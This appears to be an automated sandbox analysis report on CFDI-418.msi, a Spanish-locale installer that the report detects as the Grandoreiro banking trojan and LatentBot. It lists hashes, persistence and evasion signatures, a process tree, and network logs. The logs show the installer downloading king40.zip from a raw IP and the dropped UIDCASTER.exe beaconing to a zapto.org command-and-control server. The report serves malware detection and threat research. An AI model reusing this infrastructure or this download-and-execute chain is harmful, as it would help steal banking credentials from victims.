Overview

overview

10

Static

static

1

CFDI-418.msi

windows7-x64

8

CFDI-418.msi

windows10-2004-x64

10

Resubmissions

19/04/2023, 08:24 UTC

230419-ka3a6sbb6s 7

12/04/2023, 15:38 UTC

230412-s3a2dsdb75 10

Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-es
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
  • submitted
    12/04/2023, 15:38 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CFDI-418.msi

  • Size

    1.7MB

  • MD5

    436ec5aea13f250c2cccb899b09c30fb

  • SHA1

    d34643db6cb8269bc1ef7472f76c0f7613e68768

  • SHA256

    d85571ef1ca53d5dcac1a99b06a64af069a20dca7e9d8b7706556b1317b4fb2f

  • SHA512

    b5d52b50544452dcd9b877c7f77a4f2fd4961bcab745d1666e6f2221bfd2c416873c8d88518f8471297873899125313c62d25885d7870eec04bbc3be11f502df

  • SSDEEP

    49152:CgJZBYbX+lDiJ4H3fMUgmu1M88r6F5mCmR+iYVTA:lj8ulDHXDg/a8o6UYdA

Score
10/10
grandoreirolatentbotaspackv2bankerpersistencetrojan

Malware Config

Signatures

  • Detects Grandoreiro payload 5 IoCs
  • Grandoreiro

    Part of a group of banking trojans, targeting Spanish and Portuguese speaking countries.

    trojanbankergrandoreiro
  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

    trojanlatentbot
  • Blocklisted process makes network request 1 IoCs
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\CFDI-418.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:676
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E5A1241BAC43CFA3B384A16C58CC7554
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Nvsofrsv\UIDCASTER.exe
        "C:\Nvsofrsv\UIDCASTER.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1156

Network

  • flag-us
    DNS
    138.238.32.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.238.32.23.in-addr.arpa
    IN PTR
    Response
    138.238.32.23.in-addr.arpa
    IN PTR
    a23-32-238-138deploystaticakamaitechnologiescom
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://50.114.32.174:244/king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional)
    MsiExec.exe
    Remote address:
    50.114.32.174:244
    Request
    GET /king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional) HTTP/1.1
    User-Agent: Msiexec
    Host: 50.114.32.174:244
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Length: 18670124
    Accept-Ranges: bytes
    Server: HFS 2.4rc5
    Set-Cookie: HFS_SID_=0.913143346551806; path=/; HttpOnly
    ETag: 30C7D52D5F55D37314C0C492FB9D2D56
    Last-Modified: Wed, 12 Apr 2023 13:31:08 GMT
    Content-Disposition: attachment; filename*=UTF-8'"king40.zip";
  • flag-us
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    108.211.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    108.211.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    174.32.114.50.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.32.114.50.in-addr.arpa
    IN PTR
    Response
    174.32.114.50.in-addr.arpa
    IN PTR
    50-114-32-174 masterdawebcom
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.77.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.77.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    time.nist.gov
    UIDCASTER.exe
    Remote address:
    8.8.8.8:53
    Request
    time.nist.gov
    IN A
    Response
    time.nist.gov
    IN CNAME
    ntp1.glb.nist.gov
    ntp1.glb.nist.gov
    IN A
    132.163.97.6
  • flag-us
    DNS
    mtb475f304a.zapto.org
    UIDCASTER.exe
    Remote address:
    8.8.8.8:53
    Request
    mtb475f304a.zapto.org
    IN A
    Response
    mtb475f304a.zapto.org
    IN A
    50.114.32.174
  • flag-us
    DNS
    6.97.163.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    6.97.163.132.in-addr.arpa
    IN PTR
    Response
    6.97.163.132.in-addr.arpa
    IN PTR
    time-e-wwvnistgov
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ACTION=HELLO
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ACTION=HELLO HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 7248
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 7247
    SET-COOKIE: ID=D9AC23F8AF5F4DA088B8E13144F99C57
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 7250
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 7249
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 180
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 16
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 33
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 12
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 34
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 16
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 13593
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 14
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 28
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 12
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 139
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 28
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 149
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 31
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 15
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
  • flag-us
    DNS
    assets.msn.com
    Remote address:
    8.8.8.8:53
    Request
    assets.msn.com
    IN A
    Response
    assets.msn.com
    IN CNAME
    assets.msn.com.edgekey.net
    assets.msn.com.edgekey.net
    IN CNAME
    e28578.d.akamaiedge.net
    e28578.d.akamaiedge.net
    IN A
    95.101.74.151
    e28578.d.akamaiedge.net
    IN A
    95.101.74.139
  • flag-nl
    GET
    https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask
    Remote address:
    95.101.74.151:443
    Request
    GET /serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask HTTP/2.0
    host: assets.msn.com
    x-search-account: None
    accept-encoding: gzip, deflate
    x-device-machineid: {B5D67584-1FEF-4C28-8532-FCD3CF2C23D0}
    x-userageclass: Unknown
    x-bm-market: ES
    x-bm-dateformat: dd/MM/yyyy
    x-device-ossku: 48
    x-bm-dtz: 0
    x-deviceid: 0100B2E609000CC3
    x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11D898D7,FX:11DB147C,FX:11DE505A,FX:11E11E97,FX:11E3E2BA,FX:11E50151,FX:11E9EE98,FX:11F1992A,FX:11F4161E,FX:11F41B68,FX:11FB0F2F,FX:1201B330,FX:1202B7FC,FX:120BB68E,FX:121A20E1,FX:121BF15F,FX:121E5EC8,FX:122D8E86,FX:123031A3,FX:1231B88B,FX:123371B1,FX:1233C945,FX:123D7C31,FX:1240013C,FX:1246E4A3,FX:1248306D,FX:124B38D0,FX:1250080B,FX:125A7FDA,FX:1264FA75,FX:126DBC22,FX:127159BE,FX:12769734,FX:127C935B,FX:127DC03A,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:129135BB
    sitename: www.msn.com
    x-bm-theme: 000000;0078d7
    muid: 681106677AA44FECB67AC912899AA560
    x-agent-deviceid: 0100B2E609000CC3
    x-bm-onlinesearchdisabled: true
    x-bm-cbt: 1681321248
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    x-device-isoptin: false
    accept-language: es-ES, es, en-US, en
    x-device-touch: false
    x-device-clientsession: AC038B2FF4A941EEAF4BE0E175E3657A
    cookie: MUID=681106677AA44FECB67AC912899AA560
    Response
    HTTP/2.0 200
    content-type: application/json; charset=utf-8
    server: Kestrel
    access-control-allow-credentials: true
    access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
    access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
    access-control-allow-origin: *.msn.com
    access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
    content-encoding: gzip
    ddd-authenticatedwithjwtflow: False
    ddd-usertype: AnonymousMuid
    ddd-tmpl: SevereWeather_cold:1;winbadge:1;coldStartUpsell:1;Nowcast_cold:1;tbn:0;lowT:0;SportsMatch_all:1;WildFire_cold:1;partialResponse:1;TeaserTemp_cold:1;coldStart:1;TeaserVisibility_cold:1;lowC:0
    ddd-feednewsitemcount: 0
    x-wpo-activityid: 2E723C4B-5F0B-4696-8D18-42C08A038718|2023-04-12T15:40:50.6214239Z|fabric:/wpo|FRC|WPO_26
    ddd-activityid: 2e723c4b-5f0b-4696-8d18-42c08a038718
    ddd-strategyexecutionlatency: 00:00:00.1679464
    ddd-debugid: 2e723c4b-5f0b-4696-8d18-42c08a038718|2023-04-12T15:40:50.6269706Z|fabric:/winfeed|FRC|WinFeed_70
    onewebservicelatency: 169
    x-msedge-responseinfo: 169
    x-ceto-ref: 6436d10247154eb98c68c020d7cfcb1a|2023-04-12T15:40:50.454Z
    expires: Wed, 12 Apr 2023 15:40:50 GMT
    date: Wed, 12 Apr 2023 15:40:50 GMT
    content-length: 1856
    akamai-request-bc: [a=92.123.71.151,b=205081929,c=g,n=NL__SCHIPHOL,o=20940],[a=20.74.25.147,c=o]
    server-timing: clientrtt; dur=17, clienttt; dur=186, origin; dur=185 , cdntime; dur=1
    akamai-cache-status: Miss from child
    akamai-server-ip: 92.123.71.151
    akamai-request-id: c394d49
    x-as-suppresssetcookie: 1
    cache-control: private, max-age=0
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
    timing-allow-origin: *
    vary: Origin
  • flag-us
    DNS
    151.74.101.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.74.101.95.in-addr.arpa
    IN PTR
    Response
    151.74.101.95.in-addr.arpa
    IN PTR
    a95-101-74-151deploystaticakamaitechnologiescom
  • 50.114.32.174:244
    http://50.114.32.174:244/king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional)
    http
    MsiExec.exe
    675.4kB
     19.3MB
     14597
    14561

    HTTP Request

    GET http://50.114.32.174:244/king40.zip?Admin-Espa�ol%20(Espa�a,%20internacional)

    HTTP Response

    200
  • 20.189.173.12:443
    322 B
     7
  • 8.238.20.126:80
    322 B
     7
  • 8.238.20.126:80
    322 B
     7
  • 173.223.113.164:443
    322 B
     7
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
     223 B
     4
    4
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
     132 B
     4
    3
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
     132 B
     4
    3
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
     223 B
     4
    4
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
     223 B
     4
    4
  • 50.114.32.174:443
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    http
    UIDCASTER.exe
    25.2kB
     30.8kB
     41
    45

    HTTP Request

    POST http://50.114.32.174/$rdgate?ACTION=HELLO

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
  • 95.101.74.151:443
    https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask
    tls, http2
    2.6kB
     11.1kB
     20
    19

    HTTP Request

    GET https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask

    HTTP Response

    200
  • 8.8.8.8:53
    138.238.32.23.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    138.238.32.23.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    108.211.229.192.in-addr.arpa
    dns
    74 B
     145 B
     1
    1

    DNS Request

    108.211.229.192.in-addr.arpa

  • 8.8.8.8:53
    174.32.114.50.in-addr.arpa
    dns
    72 B
     115 B
     1
    1

    DNS Request

    174.32.114.50.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    0.77.109.52.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    0.77.109.52.in-addr.arpa

  • 8.8.8.8:53
    time.nist.gov
    dns
    UIDCASTER.exe
    59 B
     98 B
     1
    1

    DNS Request

    time.nist.gov

    DNS Response

    132.163.97.6

  • 8.8.8.8:53
    mtb475f304a.zapto.org
    dns
    UIDCASTER.exe
    67 B
     83 B
     1
    1

    DNS Request

    mtb475f304a.zapto.org

    DNS Response

    50.114.32.174

  • 8.8.8.8:53
    6.97.163.132.in-addr.arpa
    dns
    71 B
     104 B
     1
    1

    DNS Request

    6.97.163.132.in-addr.arpa

  • 8.8.8.8:53
    assets.msn.com
    dns
    60 B
     166 B
     1
    1

    DNS Request

    assets.msn.com

    DNS Response

    95.101.74.151
    95.101.74.139

  • 8.8.8.8:53
    151.74.101.95.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    151.74.101.95.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Config.Msi\e566f99.rbs
    Filesize

    754B

    MD5

    30041535412d0a2e1b55a3bf9498ba43

    SHA1

    64ec57f945be08de3963cf48a73809a5c621dd25

    SHA256

    9b5f9f1405ab87c80b079eb099ec5a292259dc7e210d12ca6bc0cfcd57126e29

    SHA512

    d19f61fccda7ede4e98f598b53c81dd82bbff4c35e9577e44545658b7cf1545e0528b21a43b0c4f608323d3a37ef24681266c1107b793130eff6ad4c63795859

    Download Submit

  • C:\Nvsofrsv\UIDCASTER.exe
    Filesize

    2.2MB

    MD5

    b5485d229f8078575d639fb903b4fca7

    SHA1

    6a67a6bb694df592819d398a645504b2c7a2221c

    SHA256

    9625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782

    SHA512

    5d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8

    Download Submit

  • C:\Nvsofrsv\UIDCASTER.exe
    Filesize

    2.2MB

    MD5

    b5485d229f8078575d639fb903b4fca7

    SHA1

    6a67a6bb694df592819d398a645504b2c7a2221c

    SHA256

    9625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782

    SHA512

    5d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8

    Download Submit

  • C:\Nvsofrsv\UIDCASTER.exe
    Filesize

    2.2MB

    MD5

    b5485d229f8078575d639fb903b4fca7

    SHA1

    6a67a6bb694df592819d398a645504b2c7a2221c

    SHA256

    9625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782

    SHA512

    5d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8

    Download Submit

  • C:\Nvsofrsv\dbghelp.dll
    Filesize

    1.2MB

    MD5

    4003e34416ebd25e4c115d49dc15e1a7

    SHA1

    faf95ec65cde5bd833ce610bb8523363310ec4ad

    SHA256

    c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

    SHA512

    88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

    Download Submit

  • C:\Nvsofrsv\dbghelp.dll
    Filesize

    1.2MB

    MD5

    4003e34416ebd25e4c115d49dc15e1a7

    SHA1

    faf95ec65cde5bd833ce610bb8523363310ec4ad

    SHA256

    c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

    SHA512

    88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

    Download Submit

  • C:\Nvsofrsv\uires.dll
    Filesize

    13.0MB

    MD5

    87c7411e05ff159a3707869adc9d5c01

    SHA1

    d147cfdc5d2ea979aa757423a0a22577c45acbe1

    SHA256

    207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7

    SHA512

    a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922

    Download Submit

  • C:\Nvsofrsv\uires.dll
    Filesize

    13.0MB

    MD5

    87c7411e05ff159a3707869adc9d5c01

    SHA1

    d147cfdc5d2ea979aa757423a0a22577c45acbe1

    SHA256

    207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7

    SHA512

    a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922

    Download Submit

  • C:\Nvsofrsv\uires.dll
    Filesize

    13.0MB

    MD5

    87c7411e05ff159a3707869adc9d5c01

    SHA1

    d147cfdc5d2ea979aa757423a0a22577c45acbe1

    SHA256

    207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7

    SHA512

    a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922

    Download Submit

  • C:\Nvsofrsv\zlibai.dll
    Filesize

    151.5MB

    MD5

    fbc66087992dfd5da6d5955144df904d

    SHA1

    d33433f0c79ebaf3b9169d9c596619110f0db5ca

    SHA256

    1b14c6d1c6c64ac56f11787ce86e631694361aac36bbf3dfb3c18615299b3f3f

    SHA512

    9b8de432b08fa758b1445db68da350eb794392ba85185f9311a618bd9383a71d91dffaa61741103c81e9a0ee14eeb7da33410f9e9f73f93929cec82941166ff2

    Download Submit

  • C:\Nvsofrsv\zlibai.dll
    Filesize

    151.5MB

    MD5

    fbc66087992dfd5da6d5955144df904d

    SHA1

    d33433f0c79ebaf3b9169d9c596619110f0db5ca

    SHA256

    1b14c6d1c6c64ac56f11787ce86e631694361aac36bbf3dfb3c18615299b3f3f

    SHA512

    9b8de432b08fa758b1445db68da350eb794392ba85185f9311a618bd9383a71d91dffaa61741103c81e9a0ee14eeb7da33410f9e9f73f93929cec82941166ff2

    Download Submit

  • C:\Nvsofrsv\zlibai.dll
    Filesize

    151.5MB

    MD5

    fbc66087992dfd5da6d5955144df904d

    SHA1

    d33433f0c79ebaf3b9169d9c596619110f0db5ca

    SHA256

    1b14c6d1c6c64ac56f11787ce86e631694361aac36bbf3dfb3c18615299b3f3f

    SHA512

    9b8de432b08fa758b1445db68da350eb794392ba85185f9311a618bd9383a71d91dffaa61741103c81e9a0ee14eeb7da33410f9e9f73f93929cec82941166ff2

    Download Submit

  • C:\Windows\Installer\MSI7033.tmp
    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

    Download Submit

  • C:\Windows\Installer\MSI7033.tmp
    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

    Download Submit

